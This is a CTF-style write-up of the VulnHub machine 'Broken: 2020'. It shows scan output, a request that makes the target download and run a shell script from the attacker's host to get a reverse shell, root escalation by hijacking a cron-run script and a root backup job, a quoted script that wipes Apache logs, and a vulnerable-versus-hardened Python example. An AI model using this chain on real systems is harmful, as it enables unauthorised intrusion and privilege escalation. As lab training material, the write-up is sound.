VulnHub Link: https://www.vulnhub.com/entry/broken-2020-1,470/
Description:
Level: beginner for user flag and intermediate for root flag. No exploit, custom exploitation is needed. Works on VirtualBox. This works better with VirtualBox rather than VMware.
So, as always, let's run nmap to scan for open ports:
> nmap -sC -sV 192.168.56.127
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 17:19 Romance Standard Time
Nmap scan report for 192.168.56.127
Host is up (0.00094s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA)
| 256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA)
|_ 256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Coming Soon
MAC Address: 08:00:27:40:46:ED (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
We have two open ports:
22 (ssh) ==> OpenSSH 7.9p1
80 (http) ==> Apache httpd 2.4.38
Let's see what we have on the HTTP server (port 80):

An HTML page with nothing on it (just "Coming Soon"), so let's run DirBuster:

DirBuster found a folder "/cms/", and browsing to it gives an installation message!

So before clicking install I started Burp Suite to intercept the requests, in case we can find something...

Not much information, but the page says "click here" to go to the website,
and then "click here" to go somewhere else (I'm not sure exactly what was written)...

The main page (index.php) has been changed (defaced)! And going back to the /cms/ folder gives another page...

And this is the first flag! Nothing else was clear at this point...
So I ran DirBuster again, and it found another directory under the "/cms/" folder, which is "/cc/" ==> http://192.168.56.127/cms/cc/

This PHP page has two input fields (Server IP and port) and a "hack" button,
and if you enter any valid IP and port it says "Server can't reach the script".

To find out what happens in the background when I click "hack", I started a local HTTP server with Python on port 8080, put my local IP in the Server IP field and submitted:
"http://192.168.56.127/cms/cc/?ip=192.168.56.1&port=8080"
192.168.56.1 ==> my local IP
8080 ==> my SimpleHTTPServer port :p
Then I noticed something in my local Python server's log:

192.168.56.127 - - [29/Apr/2020 17:24:51] "GET /e8114ea84d875ef54a6f5a1c4d8e5f20.sh HTTP/1.0" 404 -
The website was trying to download a file "e8114ea84d875ef54a6f5a1c4d8e5f20.sh" from my local server! So the page makes the target fetch a script with a fixed name from whatever ip:port we supply, and then runs it.
So I created that file with a reverse shell inside, started my listener, and repeated the "hack" request:
http://192.168.56.127/cms/cc/?ip=192.168.56.1&port=8080
and after a few seconds I had my reverse shell :D

Now for the R00T part :D
I ran some Linux enumeration scripts (LinEnum and LinPEAS) but didn't find much, so I ran pspy64 to see whether there are any cron jobs:
2020/04/29 16:21:00 CMD: UID=0 PID=10 |
2020/04/29 16:21:00 CMD: UID=0 PID=1 | /sbin/init
2020/04/29 16:21:01 CMD: UID=0 PID=9653 | /usr/sbin/CRON -f
2020/04/29 16:21:01 CMD: UID=0 PID=9652 | /usr/sbin/cron -f
2020/04/29 16:21:01 CMD: UID=0 PID=9654 | /usr/sbin/CRON -f
2020/04/29 16:21:01 CMD: UID=0 PID=9655 | /usr/sbin/CRON -f
2020/04/29 16:21:01 CMD: UID=0 PID=9656 | /bin/sh -c python /root/check.py
2020/04/29 16:21:01 CMD: UID=108 PID=9658 | /bin/sh /usr/share/sendmail/sendmail cron-msp
2020/04/29 16:21:01 CMD: UID=0 PID=9657 | /bin/sh -c sudo -u alice python /home/alice/script/log.py
2020/04/29 16:21:01 CMD: UID=0 PID=9659 | sudo -u alice python /home/alice/script/log.py
and we have some :D
First, let's read the file "/home/alice/script/log.py":
#!/usr/bin/python2.7
import requests
import os
import datetime

"""
#Juste in case I want stop this script remotly
r = requests.get("https://pastebin.com/raw/9vzu2CA5")
cmd=str(r.text)
check ="stopit"
if check == cmd :
    os.system('cp /home/alice/script/log.py /home/alice/script/log.bak')
"""

path="/var/log/apache2"
dir = os.listdir(path)
date = str(datetime.datetime.now())
for logfile in dir :
    clear = open(path+"/"+logfile, "w")
    clear.truncate(0)
    clear.close()
logfile = open("/home/alice/script/clear.log","w")
logfile.write("last clear apache log "+date)
logfile.close()
Nothing interesting in the file itself (it just truncates the Apache logs every run), but if you look at /home/alice/ you'll notice that the "script" directory is writable by us:

Which means we can rename/delete log.py and create a new file with the same name containing our reverse shell code :D Since cron runs it as "sudo -u alice", the shell comes back as alice.

Don't forget the listener on the chosen port... and after at most one minute (the cron task runs the Python file every minute) we get our shell as alice:

A "backup" folder in alice's home directory wasn't there before, so I had to check where this folder came from!
And I found something interesting in "/back/" (a folder the developer forgot to delete):

So I read the files one by one, starting with check.py:

This Python file checks how many files there are in /home/alice/script/; if there are more than two it calls another file, /root/hack.sh. That explains why the backup folder appeared after we added our own file to the script directory.

hack.sh moves the "backup" folder from /root to alice's home directory (that's what interests us). Going back to the file backup.py:

backup.py reads the path written in "/home/alice/backup/path.txt" and copies the files from that path into the same directory ("/home/alice/backup/")!
So how do we exploit that? Easy...
We write /root/ into "path.txt" and it copies all the files inside /root/ into alice's backup folder (the copy must run as root, since it can read /root/, while path.txt sits in a directory we control). We wait a minute for the cron jobs to run...
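The backup.py flaw next to a fixed version, as an added Python example. This is not the box's actual backup.py (I described that file above but did not reproduce it); it assumes the behaviour described there, read a directory name from path.txt and copy that directory's files into the backup folder, and the demo() layout with flag.txt and notes.txt is constructed for the example.

```python
#!/usr/bin/env python3
"""backup.py's trust flaw, reconstructed, beside a hardened version.

Added example, not the box's real backup.py. Assumed behaviour: read a
directory name from path.txt inside the backup folder and copy that
directory's files into the backup folder. The root cause is that a job
running as root takes its input (path.txt) from, and writes its output
to, a directory alice controls. demo() builds a constructed layout in a
temp dir instead of touching /root and /home/alice.
"""
import os
import shutil
import tempfile


def requested_dir(backup_dir):
    with open(os.path.join(backup_dir, "path.txt")) as fh:
        return fh.read().strip()


def backup_vulnerable(backup_dir):
    """What the box does: copy whatever directory path.txt names, no questions asked."""
    src = requested_dir(backup_dir)
    copied = []
    for name in sorted(os.listdir(src)):
        full = os.path.join(src, name)
        if os.path.isfile(full):
            shutil.copy2(full, os.path.join(backup_dir, name))
            copied.append(name)
    return copied


def backup_hardened(backup_dir, allowed_base):
    """Only back up directories under allowed_base, and skip symlinks.

    realpath() defeats '../' and symlinked directories; the per-file symlink
    check stops a link inside alice's tree pointing at /root/flag.txt.
    The better fix is not to run this as root at all."""
    base = os.path.realpath(allowed_base)
    src = os.path.realpath(requested_dir(backup_dir))
    if src != base and not src.startswith(base + os.sep):
        raise PermissionError("refusing %s: outside %s" % (src, base))
    copied = []
    for name in sorted(os.listdir(src)):
        full = os.path.join(src, name)
        if os.path.islink(full) or not os.path.isfile(full):
            continue
        shutil.copy2(full, os.path.join(backup_dir, name))
        copied.append(name)
    return copied


def demo():
    """Recreate the layout (root/flag.txt, home/alice/backup) and run both versions."""
    top = tempfile.mkdtemp()
    root_dir = os.path.join(top, "root")
    alice = os.path.join(top, "home", "alice")
    backup = os.path.join(alice, "backup")
    os.makedirs(root_dir)
    os.makedirs(backup)
    with open(os.path.join(root_dir, "flag.txt"), "w") as fh:
        fh.write("{FLAG3:constructed-for-this-example}\n")
    with open(os.path.join(alice, "notes.txt"), "w") as fh:
        fh.write("alice's own file\n")

    result = {}
    with open(os.path.join(backup, "path.txt"), "w") as fh:
        fh.write(root_dir + "\n")  # what we did on the box: point path.txt at /root/
    result["vulnerable"] = backup_vulnerable(backup)
    try:
        backup_hardened(backup, alice)
        result["hardened_refused"] = False
    except PermissionError:
        result["hardened_refused"] = True
    with open(os.path.join(backup, "path.txt"), "w") as fh:
        fh.write(alice + "\n")  # a legitimate request inside alice's home
    result["hardened_ok"] = backup_hardened(backup, alice)
    shutil.rmtree(top)
    return result


if __name__ == "__main__":
    print(demo())
```

The vulnerable version happily copies flag.txt out of the "root" directory; the hardened one refuses that request but still serves a path inside alice's home, which is the behaviour the script presumably wanted.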

And these are the flags (I forgot to show each step of getting them, but you can simply search for the flag.txt files):
1st flag: {FLAG1:**Defacement**}
2nd flag: {FLAG2:**Robing the rober**}
3rd flag: {FLAG3:**Power of snak**}
Follow me on Twitter : https://twitter.com/ab2pentest
If you liked my writeup and to support me for more :
https://www.buymeacoffee.com/ab2pentest
Other writeups and tools can be found here:
https://github.com/ab2pentest